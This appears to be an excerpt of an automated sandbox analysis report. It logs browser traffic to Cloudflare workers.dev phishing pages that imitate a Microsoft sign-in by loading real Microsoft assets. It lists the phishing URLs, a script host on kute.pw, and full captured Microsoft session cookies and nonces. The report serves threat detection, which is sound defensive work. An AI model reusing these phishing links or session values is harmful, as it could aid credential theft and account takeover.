esctx-lwykjbM0rLY=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-qoZVX_YgrizXycqKwDkT_rFQspY2KSRsUrBgb6U0WgnFzEuQ7BuB73wALIYWks3ZfT8HSxKuqPaLitrIL6ZbYnkwF84XHczWOEeDOvyrAn86X1bghs_E-zeryuQMfBSkgQehjfnl-lJW4S-wh-RPsCAA; fpc=ArvVJjjyUS1Oi-H4QOh3so2erOTJAQAAAPXwV90OAAAA
Source: global traffic	HTTP traffic detected: GET /65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5saXZlLmNvbQ==-lg/Me.htm?v=3 HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/QMGJqNkcP?sso_reload=trueAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 2=OIDC=1; 21=OIDC=1; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; 0=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 1=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 16=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 20=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 35=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 39=X-OWA-RedirectHistory=ArLym14BV24jRVcp3Ag; buid=0.AQoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QiWunb7PCd_EJsCp5xqZ1msAmgBchDJDI-4A-gKCWcP7Bum4_wUhBzSM9ujw79V2ClGe7QXyl5lGZJoy3qCHtQYesMeW9SB1kZfs6utnfQ0gAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-KtuURlS65aS2k6oScv_nFUCId84x_8r0S3fy34zphqcb_bL0MCk4rVm3KosZLutFI6hW1S5Kdifg1e3UObq5H6ONTUlZx_Muhyr1_z5fPZBwNMlW_kIulAJnj9sfYNvHRP01WHv-zWLI4wJry8YBcjxdErepDoK_hTw_9oe6rgsgAA; esctx-lwykjbM0rLY=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-qoZVX_YgrizXycqKwDkT_rFQspY2KSRsUrBgb6U0WgnFzEuQ7BuB73wALIYWks3ZfT8HSxKuqPaLitrIL6ZbYnkwF84XHczWOEeDOvyrAn86X1bghs_E-zeryuQMfBSkgQehjfnl-lJW4S-wh-RPsCAA; fpc=ArvVJjjyUS1Oi-H4QOh3so2erOTJAQAAAPXwV90OAAAA
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /owa/prefetch.aspx HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/appbackgrounds/49-small_2055002f2daae2ed8f69f03944c0e5d9.jpg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc2e13.jpg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/applogos/53_7a3c80bf9694448bac31a9589d2e9e92.png HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/applogos/53_7a3c80bf9694448bac31a9589d2e9e92.png HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffc2e13.jpg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/appbackgrounds/49-small_2055002f2daae2ed8f69f03944c0e5d9.jpg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /65ba6b45a7471c8dd3b9f0fd/om/PQ1Sgkxel HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 2=OIDC=1; 21=OIDC=1; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; 0=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 1=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 16=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 20=ClientId=20AED29F69CA4D6FAEEF51054A477F63; 35=OpenIdConnect.nonce.v3.a5XK0pI319c9xjk3o4q0mqd7YXpC1TpIyxamWrUSPhs=638430701978611287.416b1842-fd26-4df3-b06e-1274ac64fda1; 39=X-OWA-RedirectHistory=ArLym14BV24jRVcp3Ag; buid=0.AQoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-QiWunb7PCd_EJsCp5xqZ1msAmgBchDJDI-4A-gKCWcP7Bum4_wUhBzSM9ujw79V2ClGe7QXyl5lGZJoy3qCHtQYesMeW9SB1kZfs6utnfQ0gAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-KtuURlS65aS2k6oScv_nFUCId84x_8r0S3fy34zphqcb_bL0MCk4rVm3KosZLutFI6hW1S5Kdifg1e3UObq5H6ONTUlZx_Muhyr1_z5fPZBwNMlW_kIulAJnj9sfYNvHRP01WHv-zWLI4wJry8YBcjxdErepDoK_hTw_9oe6rgsgAA; esctx-lwykjbM0rLY=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-qoZVX_YgrizXycqKwDkT_rFQspY2KSRsUrBgb6U0WgnFzEuQ7BuB73wALIYWks3ZfT8HSxKuqPaLitrIL6ZbYnkwF84XHczWOEeDOvyrAn86X1bghs_E-zeryuQMfBSkgQehjfnl-lJW4S-wh-RPsCAA; fpc=ArvVJjjyUS1Oi-H4QOh3so2erOTJAQAAAPXwV90OAAAA; brcap=0; uaid=010960005c274feaaa7d310719d6b815; MSPRequ=id=N&lt=1707473401&co=1
Source: global traffic	HTTP traffic detected: GET /65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5saXZlLmNvbQ==-lg/Me.htm?v=3 HTTP/1.1Host: niakallzodamiozxza.pixiepowder00.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/om/PQ1SgkxelAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 2=OIDC=1; 21=OIDC=1; esctx-nNskYjUeSU8=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-6r4Fp6lExPxmdB6m6VUG1e1Q_DFac7NCVV3P6hJZjlbxyNAnhaFCH6UqK-lPh95k5CjbdNC2ZnSicGnMXdTx_BHOS67qRksylc7IONneKskwjjJgMluGttATcu5U8_jjVJEZC-AyJz119_sQsav9jyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; esctx-lwykjbM0rLY=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-qoZVX_YgrizXycqKwDkT_rFQspY2KSRsUrBgb6U0WgnFzEuQ7BuB73wALIYWks3ZfT8HSxKuqPaLitrIL6ZbYnkwF84XHczWOEeDOvyrAn86X1bghs_E-zeryuQMfBSkgQehjfnl-lJW4S-wh-RPsCAA; brcap=0; uaid=010960005c274feaaa7d310719d6b815; MSPRequ=id=N&lt=1707473401&co=1; 0=ClientId=D4DD3320633545F6B06CF240011B4815; 1=ClientId=D4DD3320633545F6B06CF240011B4815; 16=OpenIdConnect.nonce.v3.rEz1ZSgMVBbF-vDAKN0lUeTc-7rYNJuDjAikiX8BPDw=638430702039926797.326f3af8-0507-45b8-9f14-16bdbbc2d083; 20=ClientId=D4DD3320633545F6B06CF240011B4815; 35=OpenIdConnect.nonce.v3.rEz1ZSgMVBbF-vDAKN0lUeTc-7rYNJuDjAikiX8BPDw=638430702039926797.326f3af8-0507-45b8-9f14-16bdbbc2d083; 39=X-OWA-RedirectHistory=ArLym14BTWrNSFcp3Ag; buid=0.AQoAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-uyg83zEXge5bdWJYeg0yr9rzYt1O-OxIFfZ7U_fvnjNR6KmtHCfSKNcBh6RfXP4uP4xyOKSphYwZGRyiaSIObvAlpNt8BxKw0GJHlFxDPokgAA; esctx=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-pnSBxEeoBowaXU4yEJl8QFrME5YrHqsm2P_JsWRbysDpPUki6AN2-L47Zie3-THaJACE-lDQhiKvtPuaCyKh5a9hZCmi2TeNKYYylaYteeVWFzfFzjS_kD-unJuf0qezUiv5FgEkh2mdduZurdzvNZ8L3SVXuXpKWYBQxIDTEL8gAA; esctx-XfV7x2eFhLU=AQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-_3uiPJ94kK9typfQsGJLs2KSC-81W51YwNr2HlrQeVyuOedPNIkvY4YQQZoqbJF_6fYyLlH_MXG_vhz6Lnddn9QgeCriD9KJB0sJ4WYRCQ187E1iQEQGngiC_2oDvwbh4FdgFLoa0VRRTR2oCBAoxSAA; fpc=ArvVJjjyUS1Oi-H4QOh3so2erOTJAgAAAPXwV90OAAAA
Source: global traffic	HTTP traffic detected: GET /owa/prefetch.aspx HTTP/1.1Host: outlook.office365.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ClientId=B2E2C2E14559474C8766CCE47269A65D; OIDC=1
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://niakallzodamiozxza.pixiepowder00.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: khanmotiozpisx.ellieb7.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /65ba6b50a7471c8dd3b9f0fe-65ba6b45a7471c8dd3b9f0fd.js HTTP/1.1Host: rkugxtvgxusbsfrtcv.kute.pwConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?bbre=CrjRQgGBVdEMWTyZx HTTP/1.1Host: khanmotiozpisx.ellieb7.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khanmotiozpisx.ellieb7.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: clients2.google.com

Source: unknown

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg

Source: chromecache_130.2.dr	String found in binary or memory: http://feross.org
Source: chromecache_145.2.dr	String found in binary or memory: http://github.com/jquery/globalize
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://aadcdn.msauth.net
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Source: chromecache_138.2.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_GOwG3D936OfJ_-lzWtiHhg2.js
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js
Source: chromecache_123.2.dr	String found in binary or memory: https://github.com/hgoebl/mobile-detect.js
Source: chromecache_131.2.dr	String found in binary or memory: https://khanmotiozpisx.ellieb7.workers.dev/?bbre=CrjRQgGBVdEMWTyZx#/ld-Qoahakabzgvzjxn
Source: chromecache_110.2.dr	String found in binary or memory: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9sb2dpbi5s
Source: chromecache_110.2.dr	String found in binary or memory: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/aHR0cHM6Ly9vdXRsb29r
Source: chromecache_139.2.dr, chromecache_110.2.dr	String found in binary or memory: https://niakallzodamiozxza.pixiepowder00.workers.dev/65ba6b45a7471c8dd3b9f0fd/o/jsdisabled
Source: chromecache_161.2.dr	String found in binary or memory: https://npms.io/search?q=ponyfill.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
